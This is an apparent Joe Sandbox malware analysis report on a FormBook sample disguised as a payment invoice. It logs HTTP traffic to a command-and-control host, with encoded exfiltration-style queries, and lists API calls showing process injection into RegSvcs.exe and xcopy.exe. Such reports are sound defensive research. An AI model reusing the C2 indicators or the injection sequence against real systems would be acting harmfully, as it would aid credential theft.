                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            35 | 192.168.2.5 | 50018 | 154.23.181.7 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:31:55.565495014 CEST | 1716 | OUT | POST /o5z9/ HTTP/1.1
                                                                                            Host: www.ak711ka10.lat
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.ak711ka10.lat
                                                                                            Referer: http://www.ak711ka10.lat/o5z9/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 1243
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Ascii: pZxtux= [TRUNCATED]
                                                                                            Oct 24, 2024 15:31:56.509372950 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                            Server: nginx
                                                                                            Date: Thu, 24 Oct 2024 13:31:56 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 548
                                                                                            Connection: close
                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            36 | 192.168.2.5 | 50019 | 154.23.181.7 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:31:58.118626118 CEST | 414 | OUT | GET /o5z9/?pZxtux=z11/8LNw/ilOmRo5iVplmq9QJ2/sY6O9S3jiPj8IKRvMXjps+f+3QxK4x8TDiA3fpLYwxgH4NhA45modVvBwao6NdyacUH38gYwDUqZfGQ230ajUqn4GEmUCWVLyRw7Now==&C6=EXkTb HTTP/1.1
                                                                                            Host: www.ak711ka10.lat
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:31:59.072458982 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                            Server: nginx
                                                                                            Date: Thu, 24 Oct 2024 13:31:58 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 548
                                                                                            Connection: close
                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                            Target ID:0
                                                                                            Start time:09:28:50
                                                                                            Start date:24/10/2024
                                                                                            Path:C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe"
                                                                                            Imagebase:0xda0000
                                                                                            File size:764'928 bytes
                                                                                            MD5 hash:E36A9532EB81C28DD0ED418C61774138
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:3
                                                                                            Start time:09:29:03
                                                                                            Start date:24/10/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                            Imagebase:0x550000
                                                                                            File size:45'984 bytes
                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2420013773.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2421355928.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:5
                                                                                            Start time:09:29:21
                                                                                            Start date:24/10/2024
                                                                                            Path:C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe"
                                                                                            Imagebase:0x90000
                                                                                            File size:140'800 bytes
                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3912731474.0000000003070000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:6
                                                                                            Start time:09:29:22
                                                                                            Start date:24/10/2024
                                                                                            Path:C:\Windows\SysWOW64\xcopy.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\SysWOW64\xcopy.exe"
                                                                                            Imagebase:0x5e0000
                                                                                            File size:43'520 bytes
                                                                                            MD5 hash:7E9B7CE496D09F70C072930940F9F02C
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3912564101.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3912510675.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            Target ID:8
                                                                                            Start time:09:29:46
                                                                                            Start date:24/10/2024
                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                            Imagebase:0x7ff79f9e0000
                                                                                            File size:676'768 bytes
                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true


                                                                                              Execution Graph

                                                                                              Execution Coverage:12.1%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:6.5%
                                                                                              Total number of Nodes:200
                                                                                              Total number of Limit Nodes:10

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2200038853.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3290000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Ppeq
                                                                                              • API String ID: 0-2167432870

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2200038853.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3290000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Ppeq
                                                                                              • API String ID: 0-2167432870

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              APIs
                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 098DEA86
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              APIs
                                                                                              • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 098D2D27
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: InformationProcessQuery
                                                                                              • String ID:
                                                                                              • API String ID: 1778838933-0
                                                                                              APIs
                                                                                              • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 098D2D27
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: InformationProcessQuery
                                                                                              • String ID:
                                                                                              • API String ID: 1778838933-0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197381325.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1820000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197381325.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1820000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197381325.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 0149D456
                                                                                              • GetCurrentThread.KERNEL32 ref: 0149D493
                                                                                              • GetCurrentProcess.KERNEL32 ref: 0149D4D0
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0149D529
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197060825.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 0149D456
                                                                                              • GetCurrentThread.KERNEL32 ref: 0149D493
                                                                                              • GetCurrentProcess.KERNEL32 ref: 0149D4D0
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0149D529
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197060825.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 098DEA86
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0149AF9E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197060825.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                              APIs
                                                                                              • CreateActCtxA.KERNEL32(?), ref: 014959C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197060825.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 03291A02
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2200038853.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3290000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'eq
                                                                                              • API String ID: 0-1552367303
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 03291A02
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2200038853.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3290000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              APIs
                                                                                              • CreateActCtxA.KERNEL32(?), ref: 014959C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197060825.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1490000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create
                                                                                              • String ID:
                                                                                              • API String ID: 2289755597-0
                                                                                              APIs
                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 03294111
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2200038853.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3290000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallProcWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2714655100-0
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 098DE658
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 098DE658
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              APIs
                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 098DE4AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 983334009-0
                                                                                              APIs
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 098DE738
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessRead
                                                                                              • String ID:
                                                                                              • API String ID: 1726664587-0
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0149D6A7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197060825.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1490000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              APIs
                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 098DE4AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 983334009-0
                                                                                              APIs
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 098DE738
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessRead
                                                                                              • String ID:
                                                                                              • API String ID: 1726664587-0
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0149D6A7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197060825.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1490000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              APIs
                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 098DE576
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              APIs
                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 098DE576
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              APIs
                                                                                              • OutputDebugStringW.KERNELBASE(00000000), ref: 098D4128
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: DebugOutputString
                                                                                              • String ID:
                                                                                              • API String ID: 1166629820-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              APIs
                                                                                              • OutputDebugStringW.KERNELBASE(00000000), ref: 098D4128
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: DebugOutputString
                                                                                              • String ID:
                                                                                              • API String ID: 1166629820-0
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 018214F5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197381325.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1820000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0149AF9E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197060825.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1490000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 018214F5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197381325.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1820000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @
                                                                                              • API String ID: 0-2766056989
                                                                                              Strings
                                                                                              Memory Dump Source
